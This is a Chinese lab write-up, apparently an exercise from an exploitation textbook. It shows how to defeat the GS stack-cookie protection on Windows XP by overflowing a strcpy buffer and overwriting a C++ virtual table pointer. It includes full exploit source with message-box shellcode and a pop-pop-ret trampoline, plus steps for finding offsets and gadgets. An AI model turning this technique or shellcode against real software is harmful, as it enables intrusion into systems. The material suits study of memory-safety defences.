7.1 覆盖虚函数突破GS
目录
一、GS安全编译选项的保护原理
1、Security Cookie
2、变量重排
二、实验环境
三、实验代码
四、实验步骤
一、GS安全编译选项的保护原理
1、Security Cookie
GS编译选项为每个函数调用增加了一些额外的数据和操作,用以检测栈中的溢出:
- 在所有函数调用发生时,向栈帧内压入一个额外的随机DWORD,这个随机数被称为“cannary”,但如果使用IDA反汇编的话,IDA会将这个随机数标注为“Security Cookie”;
- Security Cookie位于EBP之前,系统还将在.data的内存区域存放一个Security Cookie的副本;
- 在栈中发生溢出时,Security Cookie将会被首先淹没,之后才是EBP和返回地址;
- 在函数返回之前,系统将执行一个额外的安全验证操作,被称为Security Check;
- 在Security Check的过程中,系统将会比较栈中原来存放的Security Cookie和.data中副本的值,如果两者不吻合,说明栈帧中的Security Cookie已被破坏,即栈中发生了溢出。
- 当检测到栈中发生溢出时,系统将进入异常处理流程,函数不会被正常返回,ret指令不会得到执行。
GS保护机制下的内存布局如图所示:
并不是对所有的调用函数都使用GS,以下情况将不会使用GS:
- 函数不包含缓冲区;
- 函数被定义为具有参数变量列表;
- 函数使用无保护的关键字标记;
- 函数在第一个语句中包含内嵌汇编代码;
- 缓冲区不是8字节类型且大小不大于4字节。
Security Cookie产生的细节:
- 系统以.data节的第一个双字作为Cookie的种子,或称为原始Cookie(所有函数的Cookie都用这个DWORD生成);
- 在程序每次运行时Cookie的种子都不同,因此种子具有很强的随机性;
- 在栈帧初始化以后系统用ESP异或种子,作为当前函数的Cookie,以此作为不同函数之间的区别,增加了cookie的随机性;
- 在函数返回前,用ESP还原出(异或)Cookie的种子。
2、变量重排
GS除了在返回地址前添加Security Cookie,在编译时根据局部变量的类型对变量在栈帧中的位置进行调整。 下图是标准栈与GS保护栈的对比:
回顾GS机制,程序只有在函数返回时才会检查Security Cookie,那么只要我们在函数返回劫持程序,就有可能实现对程序的溢出。
二、实验环境
操作系统:windows xp sp2
软件版本:VS2008(GS、release)、原版OD(实时调试)
三、实验代码
#include "stdafx.h"
#include "string.h"
class GSVirtual {
public :
void gsv(char * src)
{
char buf[200];
strcpy(buf, src);
bar(); // virtual function call
}
virtual void bar()
{
}
};
int main()
{
__asm int 3
GSVirtual test;
test.gsv(
"\x25\xF9\x98\x7C"//不同的机器,地址不一样
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\0"
/*
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\0"
*/
);
return 0;
}代码解释及实验思路:
(1)类GSVirtual中的gsv函数存在典型的溢出漏洞;
(2)类GSVirtual中包含一个虚函数vir;
(3)当gsv函数中的buf变量发生溢出的时候可能会影响到,如果我们可以修改虚函数表的地址,将其指向我们可以控制的内存空间,就可以在程序调用虚函数时控制程序流程。
四、实验步骤
确保缓冲区安全检查开启,也就是在函数返回时会判断security cookie是否被修改,以此判断是否出现缓冲区溢出。
使用如下代码判断:要想修改虚表指针的值,还需填充多少个字节的数据。
#include "stdafx.h"
#include "string.h"
class GSVirtual {
public :
void gsv(char * src)
{
char buf[200];
strcpy(buf, src);
bar(); // virtual function call
}
virtual void bar()
{
}
};
int main()
{
__asm int 3
GSVirtual test;
test.gsv(
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\0"
);
return 0;
}
执行strcpy操作;
执行完strcpy操作,查看内存分布,可以发现:要想在strcpy没结束之前修改虚函数表的地址,还差20字节。
将虚函数表地址修改为原始shellcode的地址,那么在程序在调用虚函数的时候,虚函数指针将会找到shellcode处。现在要做的就是让EIP寄存器指向0x00402100(内存中shellcode的起始地址)或者指向0x12FE9C(栈中shellcode的起始地址),此处需要使用跳板技术!
程序执行到CALL指令,发现没有哪个寄存器保存有0x00402100或者0x0012FE9C的值,因此使用jmp将无法达到目的。
发现:栈区0x0012FE8C是指向栈区的shellcode,因此我们可以使用pop.pop.return指令来使得EIP指向0x0012FE9C,从而指向shellcode。
注:为什么要两个pop?
因为调用call时,栈区会保存返回地址,那么0x0012FE8C将距离栈顶8字节,emm,所以需要在return(也就是EIP指向栈顶地址)时,需要pop处8字节的数据。
如何找pop.pop.return地址呢?需要用到OllyUni.dll插件。
之后,在日志里面找相关地址。
这个地址需要写成第一个pop的地址,不然,你直接就是return了,EIP会指向之前CALL的返回地址。
需要注意的是:当EIP指向0x0012FE8C时,你找的pop.pop.return的地址将会被解析成指令,这里就会出现解析出来的指令执行不了的问题,因此,如果执行不了,你得多找几次。
上述完成后,同样使用弹框failwest作为核心shellcode。
#include "stdafx.h"
#include "string.h"
class GSVirtual {
public :
void gsv(char * src)
{
char buf[200];
strcpy(buf, src);
bar(); // virtual function call
}
virtual void bar()
{
}
};
int main()
{
//__asm int 3
GSVirtual test;
test.gsv(
"\x25\xF9\x98\x7C"//不同的机器,地址不一样
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\0"
);
return 0;
} 